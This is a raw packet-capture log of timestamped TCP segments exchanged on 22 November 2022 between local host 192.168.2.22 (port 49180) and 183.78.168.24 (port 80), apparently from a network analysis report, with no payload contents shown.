                                                                                Nov 22, 2022 05:10:29.183504105 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.183564901 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.183590889 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.183703899 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.183763981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.183780909 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.183831930 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.183883905 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.183963060 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184021950 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184071064 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184139967 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.184211016 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184287071 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184304953 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.184361935 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184411049 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184536934 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184592962 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.184670925 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184722900 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184778929 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184796095 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.184899092 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184957981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.184973955 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.185020924 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.185066938 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.185165882 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.185214996 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.185265064 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.185344934 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.185457945 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.185519934 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.185570002 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.185585976 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.185698032 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.185762882 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.185777903 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.185883999 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.185933113 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.185945988 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.186057091 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.186109066 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.336927891 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.337002039 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.337059021 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.337090969 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.337147951 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.337187052 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.337229967 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.337246895 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.337528944 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.337575912 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.337615967 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.337641001 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.337754965 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.337821007 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.337871075 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.337915897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.337965965 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.338020086 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.338083029 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.338180065 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.338227987 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.338352919 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.338407040 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.338464975 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.338510990 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.338561058 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.338640928 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.338681936 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.338727951 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.338797092 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.338928938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.338992119 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.339025021 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.339071035 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.339132071 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.339200020 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.339253902 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.339292049 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.339310884 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.339471102 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.339524984 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.339570045 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.339644909 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.339725971 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.339776993 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.339818954 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.339873075 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.339937925 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.340044975 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.340104103 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.340136051 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.340179920 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.340226889 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.340322971 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.340375900 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.340420961 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.340449095 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.340550900 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.340598106 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.340619087 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.340709925 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.340848923 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.340883017 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.340938091 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.340986967 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.341001034 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.341101885 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.341155052 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.341171026 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.341293097 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.341344118 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.341368914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.341468096 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.341512918 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.341568947 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.341672897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.341795921 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.341845989 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.341871023 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.341911077 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.341959000 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.342035055 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.342073917 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.342123032 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.342197895 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.342243910 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.342289925 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.342354059 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.491309881 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.491384029 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.491435051 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.491468906 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.491524935 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.491566896 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.491620064 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.491645098 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.491700888 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.491741896 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.491794109 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.491982937 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.492121935 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.492171049 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.492192984 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.492233992 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.492294073 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.492449045 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.492538929 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.492633104 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.492675066 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.492718935 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.492769003 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.492830038 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.492882967 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.492930889 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.492986917 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.493047953 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.493145943 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.493186951 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.493212938 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.493263960 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.493314981 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.493391991 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.493437052 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.493494987 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.493613005 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.493710041 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.493757963 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.493772030 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.493864059 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.493921041 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.493990898 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.494029999 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.494077921 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.494157076 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.494203091 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.494251966 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.494317055 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.494414091 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.494467020 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.494527102 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.494674921 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.494755030 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.494846106 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.494942904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.494997978 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.495032072 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495079041 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495130062 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495146036 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.495194912 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495242119 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.495274067 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495312929 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495361090 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.495436907 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495488882 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495539904 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.495567083 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495610952 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495657921 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.495721102 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495812893 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495862961 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.495937109 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.495986938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.496035099 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.496104956 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.496200085 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.496249914 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.496275902 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.496321917 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.496370077 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.496433020 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.496525049 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.496573925 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.496654987 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.648015022 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.648099899 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.648168087 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.648210049 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.648279905 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.648339987 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.648387909 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.648433924 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.648499012 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.648544073 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.648591042 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.648652077 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.648715019 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.648757935 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.648806095 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.648976088 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.649022102 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.649044037 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.649079084 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.649168015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.649209976 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.649276972 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.649373055 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.649415016 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.649532080 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.649568081 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.649624109 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.649671078 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.649806023 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.649838924 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.649858952 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.649929047 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.649977922 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.650022984 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.650182962 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.650283098 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.650327921 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.650439024 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.650474072 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.650511026 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.650522947 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.650665998 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.650701046 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.650744915 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.650816917 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.650965929 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.651045084 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.651088953 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.651132107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.651303053 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.651345015 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.651813030 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.651889086 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.651933908 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.652008057 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.652139902 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.652295113 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.652332067 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.652347088 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.652462959 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.652544975 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.652587891 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.652703047 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.652739048 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.652852058 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.652895927 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.652934074 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.653018951 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.653096914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.653139114 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.653264046 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.653301001 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.653327942 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.653354883 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.653419018 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.653574944 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.653616905 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.653655052 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.653743029 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.653816938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.653858900 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.653897047 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.653968096 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.654416084 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.802844048 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.802913904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.802934885 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.802951097 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.802989006 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.803013086 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.803035021 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.803107977 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.803220987 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.803265095 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.803292990 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.803383112 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.803423882 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.803467989 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.803536892 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.803657055 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.803698063 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.803740025 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.803817987 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.803939104 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.803973913 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.803985119 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.804101944 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.804183006 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.804202080 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.804260969 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.804316998 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:29.804339886 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:29.804445982 CET8049180183.78.168.24192.168.2.22
